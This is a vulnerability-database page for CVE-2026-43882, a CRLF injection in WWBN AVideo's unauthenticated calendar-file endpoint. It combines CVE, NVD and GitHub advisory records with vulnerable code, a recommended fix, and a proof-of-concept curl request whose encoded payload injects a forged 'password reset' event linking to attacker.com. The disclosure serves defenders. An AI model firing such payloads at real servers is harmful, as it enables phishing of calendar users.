Vulnerability-Lookup

CVE-2026-43882 (GCVE-0-2026-43882)

Vulnerability from cvelistv5 – Published: 2026-05-11 20:40 – Updated: 2026-05-13 14:39

Title

WWBN AVideo: Unauthenticated CRLF/ICS Injection in Scheduler downloadICS.php Allows Calendar Event Spoofing

Summary

WWBN AVideo is an open source video platform. In versions up to and including 29.0, the unauthenticated plugin/Scheduler/downloadICS.php endpoint passes attacker-controlled title, description, and joinURL parameters into Scheduler::downloadICS(), which builds an ICS calendar file via the ICS helper class. ICS::escape_string() (objects/ICS.php:167-169) only escapes , and ; and does NOT neutralize CR/LF, so attacker CRLF bytes inside a property value break out and inject arbitrary ICS lines — including END:VEVENT / BEGIN:VEVENT pairs that add entire attacker-controlled calendar events. Because the malicious .ics file is served from the victim's trusted AVideo origin, this enables high-credibility calendar phishing: forged meetings with attacker-chosen SUMMARY, URL, LOCATION, and DESCRIPTION landing in the victim's calendar after import. Commit 764db592f99e545aa86bb9a4ad664ffd14c38ba5 contains an updated fix.

Severity ?

4.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

CWE

CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')

Assigner

GitHub_M

References

2 references

URL	Tags
https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_CONFIRM
https://github.com/WWBN/AVideo/commit/764db592f99…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
WWBN	AVideo	Affected: <= 29.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-43882",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-13T14:05:03.419322Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-13T14:39:21.055Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-mwgh-92m2-wvhv"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 29.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. In versions up to and including 29.0, the unauthenticated plugin/Scheduler/downloadICS.php endpoint passes attacker-controlled title, description, and joinURL parameters into Scheduler::downloadICS(), which builds an ICS calendar file via the ICS helper class. ICS::escape_string() (objects/ICS.php:167-169) only escapes , and ; and does NOT neutralize CR/LF, so attacker CRLF bytes inside a property value break out and inject arbitrary ICS lines \u2014 including END:VEVENT / BEGIN:VEVENT pairs that add entire attacker-controlled calendar events. Because the malicious .ics file is served from the victim\u0027s trusted AVideo origin, this enables high-credibility calendar phishing: forged meetings with attacker-chosen SUMMARY, URL, LOCATION, and DESCRIPTION landing in the victim\u0027s calendar after import. Commit 764db592f99e545aa86bb9a4ad664ffd14c38ba5 contains an updated fix."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-93",
              "description": "CWE-93: Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-11T20:40:53.428Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-mwgh-92m2-wvhv",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-mwgh-92m2-wvhv"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/764db592f99e545aa86bb9a4ad664ffd14c38ba5",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/764db592f99e545aa86bb9a4ad664ffd14c38ba5"
        }
      ],
      "source": {
        "advisory": "GHSA-mwgh-92m2-wvhv",
        "discovery": "UNKNOWN"
      },
      "title": "WWBN AVideo: Unauthenticated CRLF/ICS Injection in Scheduler downloadICS.php Allows Calendar Event Spoofing"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-43882",
    "datePublished": "2026-05-11T20:40:53.428Z",
    "dateReserved": "2026-05-04T15:17:09.329Z",
    "dateUpdated": "2026-05-13T14:39:21.055Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-43882",
      "date": "2026-05-25",
      "epss": "0.00033",
      "percentile": "0.09911"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-43882\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-11T22:22:12.803\",\"lastModified\":\"2026-05-13T16:16:52.543\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"WWBN AVideo is an open source video platform. In versions up to and including 29.0, the unauthenticated plugin/Scheduler/downloadICS.php endpoint passes attacker-controlled title, description, and joinURL parameters into Scheduler::downloadICS(), which builds an ICS calendar file via the ICS helper class. ICS::escape_string() (objects/ICS.php:167-169) only escapes , and ; and does NOT neutralize CR/LF, so attacker CRLF bytes inside a property value break out and inject arbitrary ICS lines \u2014 including END:VEVENT / BEGIN:VEVENT pairs that add entire attacker-controlled calendar events. Because the malicious .ics file is served from the victim\u0027s trusted AVideo origin, this enables high-credibility calendar phishing: forged meetings with attacker-chosen SUMMARY, URL, LOCATION, and DESCRIPTION landing in the victim\u0027s calendar after import. Commit 764db592f99e545aa86bb9a4ad664ffd14c38ba5 contains an updated fix.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N\",\"baseScore\":4.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-93\"}]}],\"references\":[{\"url\":\"https://github.com/WWBN/AVideo/commit/764db592f99e545aa86bb9a4ad664ffd14c38ba5\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-mwgh-92m2-wvhv\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-mwgh-92m2-wvhv\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-43882\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-13T14:05:03.419322Z\"}}}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-mwgh-92m2-wvhv\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-13T14:05:12.890Z\"}}], \"cna\": {\"title\": \"WWBN AVideo: Unauthenticated CRLF/ICS Injection in Scheduler downloadICS.php Allows Calendar Event Spoofing\", \"source\": {\"advisory\": \"GHSA-mwgh-92m2-wvhv\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 4.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"WWBN\", \"product\": \"AVideo\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 29.0\"}]}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-mwgh-92m2-wvhv\", \"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-mwgh-92m2-wvhv\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/WWBN/AVideo/commit/764db592f99e545aa86bb9a4ad664ffd14c38ba5\", \"name\": \"https://github.com/WWBN/AVideo/commit/764db592f99e545aa86bb9a4ad664ffd14c38ba5\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"WWBN AVideo is an open source video platform. In versions up to and including 29.0, the unauthenticated plugin/Scheduler/downloadICS.php endpoint passes attacker-controlled title, description, and joinURL parameters into Scheduler::downloadICS(), which builds an ICS calendar file via the ICS helper class. ICS::escape_string() (objects/ICS.php:167-169) only escapes , and ; and does NOT neutralize CR/LF, so attacker CRLF bytes inside a property value break out and inject arbitrary ICS lines \\u2014 including END:VEVENT / BEGIN:VEVENT pairs that add entire attacker-controlled calendar events. Because the malicious .ics file is served from the victim\u0027s trusted AVideo origin, this enables high-credibility calendar phishing: forged meetings with attacker-chosen SUMMARY, URL, LOCATION, and DESCRIPTION landing in the victim\u0027s calendar after import. Commit 764db592f99e545aa86bb9a4ad664ffd14c38ba5 contains an updated fix.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-93\", \"description\": \"CWE-93: Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-11T20:40:53.428Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-43882\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-13T14:39:21.055Z\", \"dateReserved\": \"2026-05-04T15:17:09.329Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-11T20:40:53.428Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-43882

Vulnerability from fkie_nvd - Published: 2026-05-11 22:22 - Updated: 2026-05-13 16:16

Severity ?

4.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/WWBN/AVideo/commit/764db592f99e545aa86bb9a4ad664ffd14c38ba5
	security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-mwgh-92m2-wvhv
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/WWBN/AVideo/security/advisories/GHSA-mwgh-92m2-wvhv

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WWBN AVideo is an open source video platform. In versions up to and including 29.0, the unauthenticated plugin/Scheduler/downloadICS.php endpoint passes attacker-controlled title, description, and joinURL parameters into Scheduler::downloadICS(), which builds an ICS calendar file via the ICS helper class. ICS::escape_string() (objects/ICS.php:167-169) only escapes , and ; and does NOT neutralize CR/LF, so attacker CRLF bytes inside a property value break out and inject arbitrary ICS lines \u2014 including END:VEVENT / BEGIN:VEVENT pairs that add entire attacker-controlled calendar events. Because the malicious .ics file is served from the victim\u0027s trusted AVideo origin, this enables high-credibility calendar phishing: forged meetings with attacker-chosen SUMMARY, URL, LOCATION, and DESCRIPTION landing in the victim\u0027s calendar after import. Commit 764db592f99e545aa86bb9a4ad664ffd14c38ba5 contains an updated fix."
    }
  ],
  "id": "CVE-2026-43882",
  "lastModified": "2026-05-13T16:16:52.543",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 1.4,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-11T22:22:12.803",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/WWBN/AVideo/commit/764db592f99e545aa86bb9a4ad664ffd14c38ba5"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-mwgh-92m2-wvhv"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-mwgh-92m2-wvhv"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-93"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-MWGH-92M2-WVHV

Vulnerability from github – Published: 2026-05-05 22:14 – Updated: 2026-05-13 14:20

Summary

AVideo: Unauthenticated CRLF/ICS Injection in Scheduler downloadICS.php Allows Calendar Event Spoofing

Details

Summary

The unauthenticated plugin/Scheduler/downloadICS.php endpoint passes attacker-controlled title, description, and joinURL parameters into Scheduler::downloadICS(), which builds an ICS calendar file via the ICS helper class. ICS::escape_string() (objects/ICS.php:167-169) only escapes , and ; and does NOT neutralize CR/LF, so attacker CRLF bytes inside a property value break out and inject arbitrary ICS lines — including END:VEVENT / BEGIN:VEVENT pairs that add entire attacker-controlled calendar events. Because the malicious .ics file is served from the victim's trusted AVideo origin, this enables high-credibility calendar phishing: forged meetings with attacker-chosen SUMMARY, URL, LOCATION, and DESCRIPTION landing in the victim's calendar after import.

Details

Vulnerable code path

plugin/Scheduler/downloadICS.php — unauthenticated entry point:

if(!AVideoPlugin::isEnabledByName('Scheduler')){
    forbiddenPage('Scheduler is disabled');
}
if(empty($_REQUEST['title'])){ forbiddenPage('Title cannot be empty'); }
if(empty($_REQUEST['date_start'])){ forbiddenPage('date_start cannot be empty'); }

Scheduler::downloadICS($_REQUEST['title'], $_REQUEST['date_start'], @$_REQUEST['date_end'],
    @$_REQUEST['reminder'], @$_REQUEST['joinURL'], @$_REQUEST['description']);

There is no session check, no CSRF token, no user-role check — only an empty-check on title/date_start and a plugin-enabled check.

plugin/Scheduler/Scheduler.php:367-382 passes inputs directly to the ICS builder:

$props = array(
    'location' => $location,
    'description' => $description,   // attacker-controlled
    'dtstart' => $dtstart,
    'dtend' => $dtend,
    'summary' => $title,             // attacker-controlled
    'url' => $joinURL,               // attacker-controlled
    'valarm' => $VALARM,
);
$ics = new ICS($props);
...
echo $icsString;

objects/ICS.php:167-169 — incomplete escape:

private function escape_string($str) {
    return preg_replace('/([\,;])/','\\\$1', $str);
}

Per RFC 5545 §3.3.11, TEXT values must also have CR/LF either folded or encoded as \n. This implementation does neither. ICS::to_string() (line 101) joins every property with "\r\n", so any raw \r\n sequence embedded in a value breaks out of the property line and injects new ICS directives.

Verified exploit output

Running the builder with a CRLF-laden description produces a file with two distinct VEVENT blocks (the second entirely attacker-controlled):

BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//hacksw/handcal//NONSGML v1.0//EN
CALSCALE:GREGORIAN
BEGIN:VEVENT
DESCRIPTION:Hello
END:VEVENT
BEGIN:VEVENT
SUMMARY:Injected
URL:http://attacker.com
DTSTART:20260501T000000Z
DTEND:20260501T130000Z
SUMMARY:Legit
URL;VALUE=URI:https://example.com
DTSTAMP:20260424T082123Z
UID:69eb2803d1aa2
END:VEVENT
END:VCALENDAR

The injected BEGIN:VEVENT / END:VEVENT pair is standards-compliant and parsed as an additional event by Outlook, Apple Calendar, Google Calendar, and Thunderbird/Lightning.

PoC

Ensure the Scheduler plugin is enabled on the target (default-shipped optional plugin, commonly enabled on streaming deployments).
Send an unauthenticated GET request with CRLF-encoded payload in description:

curl -o malicious.ics \
  'http://victim.example.com/plugin/Scheduler/downloadICS.php?title=Team%20Standup&date_start=2026-05-01+12:00&description=Hello%0D%0AEND:VEVENT%0D%0ABEGIN:VEVENT%0D%0ASUMMARY:URGENT%3A%20Password%20Reset%20Required%0D%0ADTSTART:20260601T090000Z%0D%0ADTEND:20260601T100000Z%0D%0AURL:http://attacker.com/phish%0D%0ALOCATION:Online%0D%0ADESCRIPTION:Please%20click%20the%20URL%20to%20confirm%20your%20identity'

The returned file contains two VEVENT blocks. Import into any standards-compliant calendar client — both events appear in the victim's calendar. The injected event renders with an attacker-chosen clickable URL.

Local reproduction (without needing a running server) using the same code path:

php -r "require 'objects/ICS.php'; \$p = ['description' => \"Hello\r\nEND:VEVENT\r\nBEGIN:VEVENT\r\nSUMMARY:Injected\r\nURL:http://attacker.com\", 'dtstart'=>'2026-05-01', 'dtend'=>'2026-05-01 13:00', 'summary'=>'Legit', 'url'=>'https://example.com']; echo (new ICS(\$p))->to_string();"

Produces the two-VEVENT output shown above (verified).

Impact

Same-origin calendar phishing. The .ics is served from the trusted AVideo domain, bypassing URL-reputation checks and email-filter suspicion of attacker-hosted attachments.
Arbitrary event spoofing. Attacker controls SUMMARY, DTSTART, DTEND, URL, LOCATION, DESCRIPTION, and may add further ICS properties (e.g. ORGANIZER, ATTENDEE). Many mainstream calendar clients display the URL field as a clickable link in the event body.
Integrity: Low — unwanted/forged events are added to the victim's calendar after they import the file.
Auth: None. Precondition is only that the Scheduler plugin is enabled, which is typical on deployments that use AVideo's scheduled streaming features.
Confidentiality / Availability: No direct impact.

Not a higher-severity response-splitting bug: PHP's header() blocks CRLF in response headers since 5.1.2, so the CRLF bytes do not escape into HTTP headers — only into the ICS body.

Recommended Fix

Strip or RFC-5545-encode CR/LF in ICS::escape_string() so newline bytes cannot break out of a property line. In objects/ICS.php:167-169:

private function escape_string($str) {
    // RFC 5545 §3.3.11: escape backslash, semicolon, comma; encode newlines as \n
    $str = str_replace(array("\\", "\r\n", "\r", "\n"), array("\\\\", "\\n", "\\n", "\\n"), $str);
    return preg_replace('/([\,;])/', '\\\\$1', $str);
}

Additionally, plugin/Scheduler/downloadICS.php should either require authentication or at minimum apply strict input validation (length caps, character whitelists) on title, description, and joinURL — and joinURL should continue to be validated via isValidURL() (already done) before emission. Consider adding a defence-in-depth strip of CR/LF on every $_REQUEST parameter used by Scheduler::downloadICS().

Severity ?

4.3 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "29.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-43882"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-93"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T22:14:31Z",
    "nvd_published_at": "2026-05-11T22:22:12Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe unauthenticated `plugin/Scheduler/downloadICS.php` endpoint passes attacker-controlled `title`, `description`, and `joinURL` parameters into `Scheduler::downloadICS()`, which builds an ICS calendar file via the `ICS` helper class. `ICS::escape_string()` (`objects/ICS.php:167-169`) only escapes `,` and `;` and does NOT neutralize CR/LF, so attacker CRLF bytes inside a property value break out and inject arbitrary ICS lines \u2014 including `END:VEVENT` / `BEGIN:VEVENT` pairs that add entire attacker-controlled calendar events. Because the malicious `.ics` file is served from the victim\u0027s trusted AVideo origin, this enables high-credibility calendar phishing: forged meetings with attacker-chosen `SUMMARY`, `URL`, `LOCATION`, and `DESCRIPTION` landing in the victim\u0027s calendar after import.\n\n## Details\n\n### Vulnerable code path\n\n**`plugin/Scheduler/downloadICS.php`** \u2014 unauthenticated entry point:\n\n```php\nif(!AVideoPlugin::isEnabledByName(\u0027Scheduler\u0027)){\n    forbiddenPage(\u0027Scheduler is disabled\u0027);\n}\nif(empty($_REQUEST[\u0027title\u0027])){ forbiddenPage(\u0027Title cannot be empty\u0027); }\nif(empty($_REQUEST[\u0027date_start\u0027])){ forbiddenPage(\u0027date_start cannot be empty\u0027); }\n\nScheduler::downloadICS($_REQUEST[\u0027title\u0027], $_REQUEST[\u0027date_start\u0027], @$_REQUEST[\u0027date_end\u0027],\n    @$_REQUEST[\u0027reminder\u0027], @$_REQUEST[\u0027joinURL\u0027], @$_REQUEST[\u0027description\u0027]);\n```\n\nThere is no session check, no CSRF token, no user-role check \u2014 only an empty-check on `title`/`date_start` and a plugin-enabled check.\n\n**`plugin/Scheduler/Scheduler.php:367-382`** passes inputs directly to the ICS builder:\n\n```php\n$props = array(\n    \u0027location\u0027 =\u003e $location,\n    \u0027description\u0027 =\u003e $description,   // attacker-controlled\n    \u0027dtstart\u0027 =\u003e $dtstart,\n    \u0027dtend\u0027 =\u003e $dtend,\n    \u0027summary\u0027 =\u003e $title,             // attacker-controlled\n    \u0027url\u0027 =\u003e $joinURL,               // attacker-controlled\n    \u0027valarm\u0027 =\u003e $VALARM,\n);\n$ics = new ICS($props);\n...\necho $icsString;\n```\n\n**`objects/ICS.php:167-169`** \u2014 incomplete escape:\n\n```php\nprivate function escape_string($str) {\n    return preg_replace(\u0027/([\\,;])/\u0027,\u0027\\\\\\$1\u0027, $str);\n}\n```\n\nPer RFC 5545 \u00a73.3.11, TEXT values must also have CR/LF either folded or encoded as `\\n`. This implementation does neither. `ICS::to_string()` (line 101) joins every property with `\"\\r\\n\"`, so any raw `\\r\\n` sequence embedded in a value breaks out of the property line and injects new ICS directives.\n\n### Verified exploit output\n\nRunning the builder with a CRLF-laden `description` produces a file with two distinct `VEVENT` blocks (the second entirely attacker-controlled):\n\n```\nBEGIN:VCALENDAR\nVERSION:2.0\nPRODID:-//hacksw/handcal//NONSGML v1.0//EN\nCALSCALE:GREGORIAN\nBEGIN:VEVENT\nDESCRIPTION:Hello\nEND:VEVENT\nBEGIN:VEVENT\nSUMMARY:Injected\nURL:http://attacker.com\nDTSTART:20260501T000000Z\nDTEND:20260501T130000Z\nSUMMARY:Legit\nURL;VALUE=URI:https://example.com\nDTSTAMP:20260424T082123Z\nUID:69eb2803d1aa2\nEND:VEVENT\nEND:VCALENDAR\n```\n\nThe injected `BEGIN:VEVENT` / `END:VEVENT` pair is standards-compliant and parsed as an additional event by Outlook, Apple Calendar, Google Calendar, and Thunderbird/Lightning.\n\n## PoC\n\n1. Ensure the Scheduler plugin is enabled on the target (default-shipped optional plugin, commonly enabled on streaming deployments).\n\n2. Send an unauthenticated GET request with CRLF-encoded payload in `description`:\n\n```\ncurl -o malicious.ics \\\n  \u0027http://victim.example.com/plugin/Scheduler/downloadICS.php?title=Team%20Standup\u0026date_start=2026-05-01+12:00\u0026description=Hello%0D%0AEND:VEVENT%0D%0ABEGIN:VEVENT%0D%0ASUMMARY:URGENT%3A%20Password%20Reset%20Required%0D%0ADTSTART:20260601T090000Z%0D%0ADTEND:20260601T100000Z%0D%0AURL:http://attacker.com/phish%0D%0ALOCATION:Online%0D%0ADESCRIPTION:Please%20click%20the%20URL%20to%20confirm%20your%20identity\u0027\n```\n\n3. The returned file contains two `VEVENT` blocks. Import into any standards-compliant calendar client \u2014 both events appear in the victim\u0027s calendar. The injected event renders with an attacker-chosen clickable URL.\n\nLocal reproduction (without needing a running server) using the same code path:\n\n```\nphp -r \"require \u0027objects/ICS.php\u0027; \\$p = [\u0027description\u0027 =\u003e \\\"Hello\\r\\nEND:VEVENT\\r\\nBEGIN:VEVENT\\r\\nSUMMARY:Injected\\r\\nURL:http://attacker.com\\\", \u0027dtstart\u0027=\u003e\u00272026-05-01\u0027, \u0027dtend\u0027=\u003e\u00272026-05-01 13:00\u0027, \u0027summary\u0027=\u003e\u0027Legit\u0027, \u0027url\u0027=\u003e\u0027https://example.com\u0027]; echo (new ICS(\\$p))-\u003eto_string();\"\n```\n\nProduces the two-VEVENT output shown above (verified).\n\n## Impact\n\n- **Same-origin calendar phishing.** The `.ics` is served from the trusted AVideo domain, bypassing URL-reputation checks and email-filter suspicion of attacker-hosted attachments.\n- **Arbitrary event spoofing.** Attacker controls `SUMMARY`, `DTSTART`, `DTEND`, `URL`, `LOCATION`, `DESCRIPTION`, and may add further ICS properties (e.g. `ORGANIZER`, `ATTENDEE`). Many mainstream calendar clients display the `URL` field as a clickable link in the event body.\n- **Integrity:** Low \u2014 unwanted/forged events are added to the victim\u0027s calendar after they import the file.\n- **Auth:** None. Precondition is only that the Scheduler plugin is enabled, which is typical on deployments that use AVideo\u0027s scheduled streaming features.\n- **Confidentiality / Availability:** No direct impact.\n\nNot a higher-severity response-splitting bug: PHP\u0027s `header()` blocks CRLF in response headers since 5.1.2, so the CRLF bytes do not escape into HTTP headers \u2014 only into the ICS body.\n\n## Recommended Fix\n\nStrip or RFC-5545-encode CR/LF in `ICS::escape_string()` so newline bytes cannot break out of a property line. In `objects/ICS.php:167-169`:\n\n```php\nprivate function escape_string($str) {\n    // RFC 5545 \u00a73.3.11: escape backslash, semicolon, comma; encode newlines as \\n\n    $str = str_replace(array(\"\\\\\", \"\\r\\n\", \"\\r\", \"\\n\"), array(\"\\\\\\\\\", \"\\\\n\", \"\\\\n\", \"\\\\n\"), $str);\n    return preg_replace(\u0027/([\\,;])/\u0027, \u0027\\\\\\\\$1\u0027, $str);\n}\n```\n\nAdditionally, `plugin/Scheduler/downloadICS.php` should either require authentication or at minimum apply strict input validation (length caps, character whitelists) on `title`, `description`, and `joinURL` \u2014 and `joinURL` should continue to be validated via `isValidURL()` (already done) before emission. Consider adding a defence-in-depth strip of CR/LF on every `$_REQUEST` parameter used by `Scheduler::downloadICS()`.",
  "id": "GHSA-mwgh-92m2-wvhv",
  "modified": "2026-05-13T14:20:32Z",
  "published": "2026-05-05T22:14:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-mwgh-92m2-wvhv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43882"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/764db592f99e545aa86bb9a4ad664ffd14c38ba5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo: Unauthenticated CRLF/ICS Injection in Scheduler downloadICS.php Allows Calendar Event Spoofing"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-43882 (GCVE-0-2026-43882)

FKIE_CVE-2026-43882

GHSA-MWGH-92M2-WVHV

Summary

Details

Vulnerable code path

Verified exploit output

PoC

Impact

Recommended Fix

Tags

Sightings

Nomenclature